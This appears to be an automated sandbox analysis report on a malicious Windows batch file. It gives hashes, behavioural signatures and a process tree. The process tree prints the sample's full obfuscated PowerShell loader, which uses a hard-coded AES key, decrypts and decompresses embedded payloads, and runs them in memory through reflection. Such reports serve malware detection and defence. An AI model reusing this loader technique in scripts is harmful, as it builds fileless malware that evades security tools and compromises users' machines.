Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
11-11-2024 02:25
Static task
static1
Behavioral task
behavioral1
Sample
5d6a1784c8174765c6cbcae4384a72433e0d4c853bcc83baa2a56f5e6826ecc1.bat
Resource
win7-20241010-en
windows7-x64
4 signatures
150 seconds
General
-
Target
5d6a1784c8174765c6cbcae4384a72433e0d4c853bcc83baa2a56f5e6826ecc1.bat
-
Size
1.6MB
-
MD5
28b65da7604be7bf55d110b2d521e819
-
SHA1
81c6e84481c6e930b56744c952fd6ad51d1d0510
-
SHA256
5d6a1784c8174765c6cbcae4384a72433e0d4c853bcc83baa2a56f5e6826ecc1
-
SHA512
b7cf5171c7c03952408185784617b18560113aa12495cae6feb6a1624253ab26f590f549adcb86f01b03216991eb329281362bacc0735207f17d374b6ebfc986
-
SSDEEP
24576:R7gWtTN1E+XtPIVRbYswK391U9NxwoQvn7hHBhVFbU3fY2m+7BdMtgYGURazVXm6:R8GoJVlXhwmQYRataE
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2792 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 2880 wrote to memory of 2856 2880 cmd.exe cmd.exe PID 2880 wrote to memory of 2856 2880 cmd.exe cmd.exe PID 2880 wrote to memory of 2856 2880 cmd.exe cmd.exe PID 2880 wrote to memory of 2792 2880 cmd.exe powershell.exe PID 2880 wrote to memory of 2792 2880 cmd.exe powershell.exe PID 2880 wrote to memory of 2792 2880 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\5d6a1784c8174765c6cbcae4384a72433e0d4c853bcc83baa2a56f5e6826ecc1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;cls;cls;cls;cls;cls;cls;cls;cls;cls;cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('PzSH18pJ0ENyFSM/USldXJhwnqnJUUe00JoxlVJW0c0='); $aes_var.IV=[System.Convert]::FromBase64String('9Tu4NVBBLcJYA/vSvSTOtw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$RwOEe=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$gtrMl=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$vevrb=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($RwOEe, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $vevrb.CopyTo($gtrMl); $vevrb.Dispose(); $RwOEe.Dispose(); $gtrMl.Dispose(); $gtrMl.ToArray();}function execute_function($param_var,$param2_var){ IEX '$qIMhL=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$WefkQ=$qIMhL.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$WefkQ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$UgEHe = 'C:\Users\Admin\AppData\Local\Temp\5d6a1784c8174765c6cbcae4384a72433e0d4c853bcc83baa2a56f5e6826ecc1.bat';$host.UI.RawUI.WindowTitle = $UgEHe;$KMhqS=[System.IO.File]::ReadAllText($UgEHe).Split([Environment]::NewLine);foreach ($xITWx in $KMhqS) { if ($xITWx.StartsWith('CJcwMcQcauxKDynFigtW')) { $JAGyo=$xITWx.Substring(20); break; }}$payloads_var=[string[]]$JAGyo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-